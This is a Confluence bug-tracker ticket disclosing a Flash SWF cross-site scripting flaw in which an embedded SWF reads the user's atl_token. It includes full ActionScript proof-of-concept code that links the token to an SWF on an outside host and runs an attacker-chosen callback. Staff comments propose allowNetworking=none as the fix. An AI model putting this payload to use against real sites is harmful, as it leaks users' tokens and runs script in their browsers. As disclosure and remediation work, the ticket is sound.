[CONFSERVER-38127] xss by swf file

Type: Bug
Resolution: Fixed
Priority: Low
Fix Version/s: 5.8.6
Affects Version/s: 5.7.4
Component/s: None
Labels:

CVSS Score:
4.9
Bug Fix Policy:
View Atlassian Server bug fix policy

In confluence comment module user can embed swf file in their comment, confluence are using a `atl_token` parameter on GET HTTP request, if the attacker send the link of .swf file( the value of src on embed tag) to his victim the malicious .SWF won't execute on the victim's browser .

We can bypass this protection by using this.loaderInfo.parameters in malicious .swf, this.loaderInfo.parameters.parameter_name extract the value of your target parameter, in this case it is atl_token , i also inserted a <a> tag in malicous swf file so if the victim clicks the link in our embed swf file the .swf file will be run in the victim's browser.

PAYLOAD

package
{
import flash.display.Sprite;
import flash.text.TextFormat;
import flash.text.TextField;
import flash.external.ExternalInterface;

public class Main extends Sprite
{

public function Main()
{
super();
var myFormat:TextFormat = new TextFormat();
myFormat.size = 200;
var xcode:String = this.loaderInfo.parameters.atl_token;
var myText:TextField = new TextField();
myText.width = 1000;
myText.height = 1000;
myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>";
addChild(myText);
ExternalInterface.call(this.loaderInfo.parameters.callback,"xss");
}
}
}

- - Sort By Name
  - Sort By Date
  - Ascending
  - Descending
  - Thumbnails
  - List

NewProject.swf
1 kB
06/Jul/2015 3:40 AM

mentioned in: Page Failed to load

David Black added a comment - 16/Jul/2015 3:45 AM

maradrianbelen please wait at least two weeks after after Confluence has officially released 5.8.6 before removing the security restrictions on this issue.

David Black added a comment - 16/Jul/2015 3:45 AM maradrianbelen please wait at least two weeks after after Confluence has officially released 5.8.6 before removing the security restrictions on this issue.

adrianbelen NA added a comment - 07/Jul/2015 1:17 AM

looks like this is ok https://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html#articlecontentAdobe_numberedheader_1

adrianbelen NA added a comment - 07/Jul/2015 1:17 AM looks like this is ok https://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html#articlecontentAdobe_numberedheader_1

David Black added a comment - 06/Jul/2015 3:53 AM - edited

According to http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00000463.html & https://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html#articlecontentAdobe_numberedheader_1 we need to set

 allowNetworking=none

to fix this problem.

David Black added a comment - 06/Jul/2015 3:53 AM - edited According to http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00000463.html & https://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html#articlecontentAdobe_numberedheader_1 we need to set allowNetworking=none to fix this problem.

adrianbelen NA added a comment - 06/Jul/2015 3:23 AM

Confluence 5.7.4

adrianbelen NA added a comment - 06/Jul/2015 3:23 AM Confluence 5.7.4

Minh Tran added a comment - 06/Jul/2015 3:16 AM

Dear maradrianbelen,

Thanks for submitting the ticket
Would you please let me know what affect version of Confluence that you met this issue?

Thanks,
Minh Tran
Confluence BugMaster
Atlassian

Minh Tran added a comment - 06/Jul/2015 3:16 AM Dear maradrianbelen , Thanks for submitting the ticket Would you please let me know what affect version of Confluence that you met this issue? Thanks, Minh Tran Confluence BugMaster Atlassian

adrianbelen NA added a comment - 06/Jul/2015 2:37 AM

upload the swf file first in the attachment then embbed the swf file

click the flash file ,normally this is *not * allow because the alt_token is unique for every user

here some video :https://www.dropbox.com/s/hd08iq21fv5bnbb/xss%20of%20the%20dig_x264.mp4?dl=0

sample(click the embed flash be) : https://pwnie.ninja/confluence/display/IKB/IT+Knowledge+Base?focusedCommentId=16384021&refresh=1434446493103#comment-16384021

adrianbelen NA added a comment - 06/Jul/2015 2:37 AM upload the swf file first in the attachment then embbed the swf file click the flash file ,normally this is *not * allow because the alt_token is unique for every user here some video : https://www.dropbox.com/s/hd08iq21fv5bnbb/xss%20of%20the%20dig_x264.mp4?dl=0 sample(click the embed flash be) : https://pwnie.ninja/confluence/display/IKB/IT+Knowledge+Base?focusedCommentId=16384021&refresh=1434446493103#comment-16384021

Assignee:: Phong Quoc Le (Inactive)

Reporter:: adrianbelen NA

Affected customers:: 0 This affects my team

Watchers:: 2 Start watching this issue

Created:: 02/Jul/2015 3:27 AM

Updated:: 11/Oct/2018 9:02 AM

Resolved:: 16/Jul/2015 3:15 AM

Confluence Data Center

Details

Description

Attachments

Attachments

Issue Links

Forms

Activity

Collapse comment: David Black added a comment - 16/Jul/2015 3:45 AM

Expand comment: David Black added a comment - 16/Jul/2015 3:45 AM

Collapse comment: adrianbelen NA added a comment - 07/Jul/2015 1:17 AM

Expand comment: adrianbelen NA added a comment - 07/Jul/2015 1:17 AM

Collapse comment: David Black added a comment - 06/Jul/2015 3:53 AM, Edited by David Black - 06/Jul/2015 3:53 AM

Expand comment: David Black added a comment - 06/Jul/2015 3:53 AM, Edited by David Black - 06/Jul/2015 3:53 AM

Collapse comment: adrianbelen NA added a comment - 06/Jul/2015 3:23 AM

Expand comment: adrianbelen NA added a comment - 06/Jul/2015 3:23 AM

Collapse comment: Minh Tran added a comment - 06/Jul/2015 3:16 AM

Expand comment: Minh Tran added a comment - 06/Jul/2015 3:16 AM

Collapse comment: adrianbelen NA added a comment - 06/Jul/2015 2:37 AM

Expand comment: adrianbelen NA added a comment - 06/Jul/2015 2:37 AM

People

Dates